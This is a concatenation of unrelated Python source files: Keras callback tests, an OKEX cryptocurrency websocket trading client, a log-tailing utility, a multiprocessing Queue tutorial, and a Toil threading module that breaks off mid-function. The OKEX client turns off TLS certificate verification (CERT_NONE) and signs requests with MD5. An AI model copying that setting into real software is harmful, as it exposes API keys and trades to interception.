callbacks=callbacks_factory(histogram_freq=0), epochs=2)
# fit generator without validation data
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0,
embeddings_freq=0))
# fit generator with validation data and accuracy
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=2,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq, embeddings_freq=1):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=embeddings_freq,
embeddings_layer_names=['dense_1'],
embeddings_data=X_test,
batch_size=5)]
# fit without validation data should raise ValueError if histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=1), epochs=3)
assert 'validation_data must be provided' in str(raised_exception.value)
train_generator = data_generator(X_train, y_train, batch_size)
validation_generator = data_generator(X_test, y_test, batch_size)
# fit generator without validation data should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(train_generator,
len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
# fit generator with validation data generator should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(train_generator, len(X_train), epochs=2,
validation_data=validation_generator,
validation_steps=1,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
@pytest.mark.skipif((K.backend() == 'mxnet'),
reason='MXNet backend does not support Lambda yet.')
def test_TensorBoard_multi_input_output(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks(
input_shape=(input_dim, input_dim))
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
inp1 = Input((input_dim, input_dim))
inp2 = Input((input_dim, input_dim))
inp_3d = add([inp1, inp2])
inp_2d = GlobalAveragePooling1D()(inp_3d)
# test a layer with a list of output tensors
inp_pair = Lambda(lambda x: x)([inp_3d, inp_2d])
hidden = dot(inp_pair, axes=-1)
hidden = Dense(num_hidden, activation='relu')(hidden)
hidden = Dropout(0.1)(hidden)
output1 = Dense(num_classes, activation='softmax')(hidden)
output2 = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=[inp1, inp2], outputs=[output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq, embeddings_freq=1):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=embeddings_freq,
embeddings_layer_names=['dense_1'],
embeddings_data=[X_test] * 2,
batch_size=5)]
# fit without validation data
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0),
epochs=3)
# fit with validation data and accuracy
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
train_generator = data_generator([X_train] * 2, [y_train] * 2, batch_size)
# fit generator without validation data
model.fit_generator(train_generator, len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0,
embeddings_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(train_generator, len(X_train), epochs=2,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@pytest.mark.skipif((K.backend() == 'mxnet'),
reason='MXNet backend does not support it yet.')
def test_TensorBoard_convnet(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
input_shape = (16, 16, 3)
(x_train, y_train), (x_test, y_test) = get_data_callbacks(
num_train=500,
num_test=200,
input_shape=input_shape)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
model = Sequential([
Conv2D(filters=8, kernel_size=3,
activation='relu',
input_shape=input_shape),
MaxPooling2D(pool_size=2),
Conv2D(filters=4, kernel_size=(3, 3),
activation='relu', padding='same'),
GlobalAveragePooling2D(),
Dense(num_classes, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
write_images=True, write_grads=True,
batch_size=16)
cbks = [tsb]
model.summary()
history = model.fit(x_train, y_train, epochs=2, batch_size=16,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def test_TensorBoard_display_float_from_logs(tmpdir):
filepath = str(tmpdir / 'logs')
input_shape = (3,)
(x_train, y_train), _ = get_data_callbacks(num_train=10,
num_test=0,
input_shape=input_shape)
y_train = np_utils.to_categorical(y_train)
model = Sequential([
Dense(num_classes, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop')
class CustomCallback(callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
logs['test'] = 0.
tsb = callbacks.TensorBoard(log_dir=filepath,
batch_size=16)
cbks = [CustomCallback(), tsb]
model.fit(x_train, y_train, epochs=2, batch_size=16,
callbacks=cbks,
verbose=0)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def test_CallbackValData():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=1,
validation_data=(X_test, y_test),
callbacks=[cbk2])
# callback validation data should always have x, y, and sample weights
assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
assert cbk.validation_data[0] is cbk2.validation_data[0]
assert cbk.validation_data[1] is cbk2.validation_data[1]
assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
def test_LambdaCallback():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and
# be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(
on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
p.join()
assert not p.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(tmpdir):
import shutil
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def tests_RemoteMonitor():
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.RemoteMonitor()]
with patch('requests.post'):
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
def tests_RemoteMonitorWithJsonPayload():
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.RemoteMonitor(send_as_json=True)]
with patch('requests.post'):
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
def mxnet_model_checkpoint_test_helper(monitor, save_best_only, mode, prefix='test', epochs=1):
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.MXNetModelCheckpoint(prefix, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=epochs)
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_auto_mode():
mxnet_model_checkpoint_test_helper(monitor='val_loss', save_best_only=False, mode='auto')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_min_mode():
mxnet_model_checkpoint_test_helper(monitor='val_loss', save_best_only=False, mode='min')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_max_mode():
mxnet_model_checkpoint_test_helper(monitor='val_acc', save_best_only=False, mode='max')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_best_max_mode():
mxnet_model_checkpoint_test_helper(monitor='val_acc', save_best_only=True, mode='max', epochs=2)
# Since we say save_best_only, we need to have only one model file with test-0000.params and test-symbol.json
assert not os.path.isfile('test-0001.params')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_auto_mode_multi_epoch():
mxnet_model_checkpoint_test_helper(monitor='val_acc', save_best_only=False, mode='auto', epochs=2)
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
assert os.path.isfile('test-0001.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
os.remove('test-0001.params')
if __name__ == '__main__':
pytest.main([__file__])
|
vnokex.py
|
# encoding: UTF-8
from __future__ import print_function
import ssl
import hashlib
import json
import traceback
from threading import Thread
from time import sleep
import websocket
from func import *
# 常量定义
OKEX_SPOT_HOST = 'wss://real.okex.com:10441/websocket'
OKEX_FUTURE_HOST = 'wss://real.okex.com:10440/websocket'
SPOT_CURRENCY = ["usdt",
"btc",
"ltc",
"eth",
"etc",
"bch", "eos"]
SPOT_SYMBOL = ["ltc_btc",
"eth_btc",
"etc_btc",
"bch_btc",
"btc_usdt",
"eth_usdt",
"ltc_usdt",
"etc_usdt",
"bch_usdt",
"etc_eth",
"bt1_btc",
"bt2_btc",
"btg_btc",
"qtum_btc",
"hsr_btc",
"neo_btc",
"gas_btc",
"qtum_usdt",
"hsr_usdt",
"neo_usdt",
"gas_usdt", "eos_usdt"]
KLINE_PERIOD = ["1min",
"3min",
"5min",
"15min",
"30min",
"1hour",
"2hour",
"4hour",
"6hour",
"12hour",
"day",
"3day",
"week"]
########################################################################
class OkexApi(object):
"""交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.host = '' # 服务器
self.apiKey = '' # 用户名
self.secretKey = '' # 密码
self.active = False # 工作状态
self.ws = None # websocket应用对象
self.wsThread = None # websocket工作线程
self.heartbeatCount = 0 # 心跳计数
self.heartbeatThread = None # 心跳线程
self.heartbeatReceived = True # 心跳是否收到
self.reconnecting = False # 重新连接中
#----------------------------------------------------------------------
def heartbeat(self):
""""""
while self.active:
self.heartbeatCount += 1
if self.heartbeatCount < 10:
sleep(1)
else:
self.heartbeatCount = 0
if not self.heartbeatReceived:
self.reconnect()
else:
self.heartbeatReceived = False
d = {'event': 'ping'}
j = json.dumps(d)
try:
self.ws.send(j)
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
if not self.reconnecting:
self.reconnecting = True
self.closeWebsocket() # 首先关闭之前的连接
self.initWebsocket()
self.reconnecting = False
#----------------------------------------------------------------------
def connect(self, host, apiKey, secretKey, trace=False):
"""连接"""
self.host = host
self.apiKey = apiKey
self.secretKey = secretKey
websocket.enableTrace(trace)
self.initWebsocket()
self.active = True
#----------------------------------------------------------------------
def initWebsocket(self):
""""""
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessageCallback,
on_error=self.onErrorCallback,
on_close=self.onCloseCallback,
on_open=self.onOpenCallback)
kwargs = {'sslopt': {'cert_reqs': ssl.CERT_NONE}}
self.wsThread = Thread(target=self.ws.run_forever, kwargs=kwargs)
self.wsThread.start()
#----------------------------------------------------------------------
def readData(self, evt):
"""解码推送收到的数据"""
data = json.loads(evt)
return data
#----------------------------------------------------------------------
def closeHeartbeat(self):
"""关闭接口"""
if self.heartbeatThread and self.heartbeatThread.isAlive():
self.active = False
self.heartbeatThread.join()
#----------------------------------------------------------------------
def closeWebsocket(self):
"""关闭WS"""
if self.wsThread and self.wsThread.isAlive():
self.ws.close()
self.wsThread.join()
#----------------------------------------------------------------------
def close(self):
""""""
self.closeHeartbeat()
self.closeWebsocket()
#----------------------------------------------------------------------
def onMessage(self, data):
"""信息推送"""
print('onMessage')
print(data)
#----------------------------------------------------------------------
def onError(self, data):
"""错误推送"""
print('onError')
print(data)
#----------------------------------------------------------------------
def onClose(self):
"""接口断开"""
print('onClose')
#----------------------------------------------------------------------
def onOpen(self):
"""接口打开"""
print('onOpen')
#----------------------------------------------------------------------
def onMessageCallback(self, evt):
""""""
data = self.readData(evt)
if 'event' in data:
self.heartbeatReceived = True
else:
self.onMessage(data[0])
#----------------------------------------------------------------------
def onErrorCallback(self, evt):
""""""
self.onError(evt)
#----------------------------------------------------------------------
#def onCloseCallback(self, ws):
def onCloseCallback(self):
""""""
self.onClose()
#----------------------------------------------------------------------
#def onOpenCallback(self, ws):
def onOpenCallback(self):
""""""
if not self.heartbeatThread:
self.heartbeatThread = Thread(target=self.heartbeat)
self.heartbeatThread.start()
self.onOpen()
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
#----------------------------------------------------------------------
def sendRequest(self, channel, params=None):
"""发送请求"""
# 生成请求
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
# 如果有参数,在参数字典中加上api_key和签名字段
if params is not None:
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
self.reconnect()
return False
#----------------------------------------------------------------------
def login(self):
params = {}
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'login'
d['parameters'] = params
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
self.reconnect()
return False
########################################################################
class OkexSpotApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexSpotApi, self).__init__()
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货的Tick"""
channel = 'ok_sub_spot_%s_ticker' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth=0):
"""订阅现货的深度"""
channel = 'ok_sub_spot_%s_depth' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDeals(self, symbol):
channel = 'ok_sub_spot_%s_deals' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotKlines(self, symbol, period):
channel = 'ok_sub_spot_%s_kline_%s' %(symbol, period)
self.sendRequest(channel)
#----------------------------------------------------------------------
def spotOrder(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot_order'
return self.sendRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_cancel_order'
self.sendRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot_userinfo'
self.sendRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_orderinfo'
self.sendRequest(channel, params)
#----------------------------------------------------------------------
def subSpotOrder(self, symbol):
"""订阅委托推送"""
channel = 'ok_sub_spot_%s_order' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subSpotBalance(self, symbol):
"""订阅资金推送"""
channel = 'ok_sub_spot_%s_balance' %symbol
self.sendRequest(channel)
########################################################################
class OkexFutureApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexFutureApi, self).__init__()
#----------------------------------------------------------------------
def subscribeFutureTicker(self, symbol):
"""订阅现货的Tick"""
symbol = symbol.split('_')[0]
channel = 'ok_sub_futureusd_%s_ticker_this_week' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeFutureDepth(self, symbol, depth=0):
"""订阅现货的深度"""
symbol = symbol.split('_')[0]
channel = 'ok_sub_futureusd_%s_depth_this_week' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendRequest(channel)
#----------------------------------------------------------------------
#def subscribeSpotDeals(self, symbol):
# channel = 'ok_sub_spot_%s_deals' %symbol
# self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeFutureKlines(self, symbol, period):
symbol = symbol.split('_')[0]
channel = 'ok_sub_futureusd_%s_kline_%s_this_week' %(symbol, period)
self.sendRequest(channel)
#----------------------------------------------------------------------
def futureOrder(self, symbol, type_, price, amount, match_price = '1'):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
params['match_price'] = match_price
params['contract_type'] = 'this_week'
futureTrade(params)
#return self.sendRequest(channel, params)
#----------------------------------------------------------------------
def futureCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = 'this_week'
futureCancel(params)
#channel = 'ok_spot_cancel_order'
#self.sendRequest(channel, params)
#----------------------------------------------------------------------
def futureUserInfo(self):
"""查询现货账户"""
channel = 'ok_sub_futureusd_userinfo'
self.sendRequest(channel, {})
#----------------------------------------------------------------------
# def spotOrderInfo(self, symbol, orderid):
# """查询现货委托信息"""
# params = {}
# params['symbol'] = str(symbol)
# params['order_id'] = str(orderid)
# channel = 'ok_spot_orderinfo'
# self.sendRequest(channel, params)
# #----------------------------------------------------------------------
# def subSpotOrder(self, symbol):
# """订阅委托推送"""
# channel = 'ok_sub_spot_%s_order' %symbol
# self.sendRequest(channel)
# #----------------------------------------------------------------------
# def subSpotBalance(self, symbol):
# """订阅资金推送"""
# channel = 'ok_sub_spot_%s_balance' %symbol
# self.sendRequest(channel)
|
LogWatcher.py
|
import sys
import time
import errno
import os
import signal
import threading
class LogWatcher:
def __init__(self, logPath, logFunc):
self.thread = threading.Thread(target=self.update)
# Setting daemon to true will kill the thread if the main
# thread aborts (eg. user hitting ctrl+c)
self.thread.daemon = True
self.logPath = logPath
self.logFunc = logFunc
self.killed = False
self.isDone = False
def start(self):
self.thread.start()
def stop(self):
self.killed = True
def update(self):
# Wait until file exists
while True:
if self.killed:
return
if os.path.isfile(self.logPath):
break
time.sleep(1)
with open(self.logPath, 'r', encoding='utf-8', errors='ignore') as logFile:
logFile.seek(0,2)
while not self.killed:
try:
where = logFile.tell()
except:
time.sleep(0.1)
continue
line = logFile.readline()
if not line:
time.sleep(1)
logFile.seek(where)
else:
self.logFunc(line.strip())
# Make sure we get the rest of the log before quitting
while True:
line = logFile.readline()
if not line:
break
self.logFunc(line.strip())
self.isDone = True
def onLog(logStr):
print(logStr)
if __name__ == '__main__':
import msvcrt
if len(sys.argv) != 2:
print("Invalid # of arguments")
exit(-1)
path = sys.argv[1]
log = LogWatcher(path, onLog)
log.start()
while 1:
if msvcrt.kbhit():
key = msvcrt.getch().decode('UTF-8')
if ord(key) == 27:
sys.exit()
if key == 'c':
os.system('cls')
time.sleep(0.1)
log.stop()
|
1.4.1.4.py
|
#Queue进程间通信
from multiprocessing import Process, Queue
import os, time, random
# 写数据进程执行的代码:
def proc_write(q,urls):
print('Process(%s) is writing...' % os.getpid())
for url in urls:
q.put(url)
print('Put %s to queue...' % url)
time.sleep(random.random())
# 读数据进程执行的代码:
def proc_read(q):
print('Process(%s) is reading...' % os.getpid())
while True:
url = q.get(True)
print('Get %s from queue.' % url)
if __name__=='__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
proc_writer1 = Process(target=proc_write, args=(q,['url_1', 'url_2', 'url_3']))
proc_writer2 = Process(target=proc_write, args=(q,['url_4','url_5','url_6']))
proc_reader = Process(target=proc_read, args=(q,))
# 启动子进程proc_writer,写入:
proc_writer1.start()
proc_writer2.start()
# 启动子进程proc_reader,读取:
proc_reader.start()
# 等待proc_writer结束:
proc_writer1.join()
proc_writer2.join()
# proc_reader进程里是死循环,无法等待其结束,只能强行终止:
proc_reader.terminate()
'''
Process(3320) is writing...
Put url_1 to queue...
Process(3321) is writing...
Put url_4 to queue...
Process(3322) is reading...
Get url_1 from queue.
Get url_4 from queue.
Put url_5 to queue...
Get url_5 from queue.
Put url_6 to queue...
Get url_6 from queue.
Put url_2 to queue...
Get url_2 from queue.
Put url_3 to queue...
Get url_3 from queue.
'''
|
threading.py
|
# Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# 5.14.2018: copied into Toil from https://github.com/BD2KGenomics/bd2k-python-lib
# Note: renamed from "threading.py" to "threading.py" to avoid conflicting imports
# from the built-in "threading" from psutil in python3.9
import atexit
import fcntl
import logging
import math
import os
import sys
import tempfile
import threading
import traceback
from contextlib import contextmanager
from typing import Any, Dict, Iterator, Optional
import psutil # type: ignore
from toil.lib.exceptions import raise_
from toil.lib.io import robust_rmtree
logger = logging.getLogger(__name__)
class ExceptionalThread(threading.Thread):
"""
A thread whose join() method re-raises exceptions raised during run(). While join() is
idempotent, the exception is only during the first invocation of join() that successfully
joined the thread. If join() times out, no exception will be re reraised even though an
exception might already have occured in run().
When subclassing this thread, override tryRun() instead of run().
>>> def f():
... assert 0
>>> t = ExceptionalThread(target=f)
>>> t.start()
>>> t.join()
Traceback (most recent call last):
...
AssertionError
>>> class MyThread(ExceptionalThread):
... def tryRun( self ):
... assert 0
>>> t = MyThread()
>>> t.start()
>>> t.join()
Traceback (most recent call last):
...
AssertionError
"""
exc_info = None
def run(self) -> None:
try:
self.tryRun()
except:
self.exc_info = sys.exc_info()
raise
def tryRun(self) -> None:
super().run()
def join(self, *args: Optional[float], **kwargs: Optional[float]) -> None:
super().join(*args, **kwargs)
if not self.is_alive() and self.exc_info is not None:
exc_type, exc_value, traceback = self.exc_info
self.exc_info = None
raise_(exc_type, exc_value, traceback)
def cpu_count() -> Any:
"""
Get the rounded-up integer number of whole CPUs available.
Counts hyperthreads as CPUs.
Uses the system's actual CPU count, or the current v1 cgroup's quota per
period, if the quota is set.
Ignores the cgroup's cpu shares value, because it's extremely difficult to
interpret. See https://github.com/kubernetes/kubernetes/issues/81021.
Caches result for efficiency.
:return: Integer count of available CPUs, minimum 1.
:rtype: int
"""
cached = getattr(cpu_count, 'result', None)
if cached is not None:
# We already got a CPU count.
return cached
# Get the fallback answer of all the CPUs on the machine
total_machine_size = psutil.cpu_count(logical=True)
logger.debug('Total machine size: %d cores', total_machine_size)
try:
with open('/sys/fs/cgroup/cpu/cpu.cfs_quota_us') as stream:
# Read the quota
quota = int(stream.read())
logger.debug('CPU quota: %d', quota)
if quota == -1:
# Assume we can use the whole machine
return total_machine_size
with open('/sys/fs/cgroup/cpu/cpu.cfs_period_us') as stream:
# Read the period in which we are allowed to burn the quota
period = int(stream.read())
logger.debug('CPU quota period: %d', period)
# The thread count is how many multiples of a wall clcok period we can burn in that period.
cgroup_size = int(math.ceil(float(quota)/float(period)))
logger.debug('Cgroup size in cores: %d', cgroup_size)
except:
# We can't actually read these cgroup fields. Maybe we are a mac or something.
logger.debug('Could not inspect cgroup: %s', traceback.format_exc())
cgroup_size = float('inf') # type: ignore
# Return the smaller of the actual thread count and the cgroup's limit, minimum 1.
result = max(1, min(cgroup_size, total_machine_size))
logger.debug('cpu_count: %s', str(result))
# Make sure to remember it for the next call
setattr(cpu_count, 'result', result)
return result
# PIDs are a bad identifier, because they are not shared between containers
# and also may be reused.
# So instead we have another system for file store implementations to
# coordinate among themselves, based on file locks.
# TODO: deduplicate with DeferredFunctionManager?
# TODO: Wrap in a class as static methods?
# Note that we don't offer a way to enumerate these names. You can only get
# your name and poll others' names (or your own). So we don't have
# distinguishing prefixes or WIP suffixes to allow for enumeration.
# We keep one name per unique base directory (probably a Toil coordination
# directory).
# We have a global lock to control looking things up
current_process_name_lock = threading.Lock()
# And a global dict from work directory to name in that work directory.
# We also have a file descriptor per work directory but it is just leaked.
current_process_name_for: Dict[str, str] = {}
def collect_process_name_garbage() -> None:
"""
Delete all the process names that point to files that don't exist anymore
(because the work directory was temporary and got cleaned up). This is
known to happen during the tests, which get their own temp directories.
Caller must hold current_process_name_lock.
"""
global current_process_name_for
# Collect the base_dirs of the missing names to delete them after iterating.
missing = []
for base_dir, name in current_process_name_for.items():
if not os.path.exists(os.path.join(base_dir, name)):
# The name file is gone, probably because the work dir is gone.
missing.append(base_dir)
for base_dir in missing:
del current_process_name_for[base_dir]
def destroy_all_process_names() -> None:
"""
Delete all our process name files because our process is going away.
We let all our FDs get closed by the process death.
We assume there is nobody else using the system during exit to race with.
"""
global current_process_name_for
for base_dir, name in current_process_name_for.items():
robust_rmtree(os.path.join(base_dir, name))
# Run the cleanup at exit
atexit.register(destroy_all_process_names)
def get_process_name(base_dir: str) -> str:
"""
Return the name of the current process. Like a PID but visible between
containers on what to Toil appears to be a node.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:return: Process's assigned name
:rtype: str
"""
global current_process_name_lock
global current_process_name_for
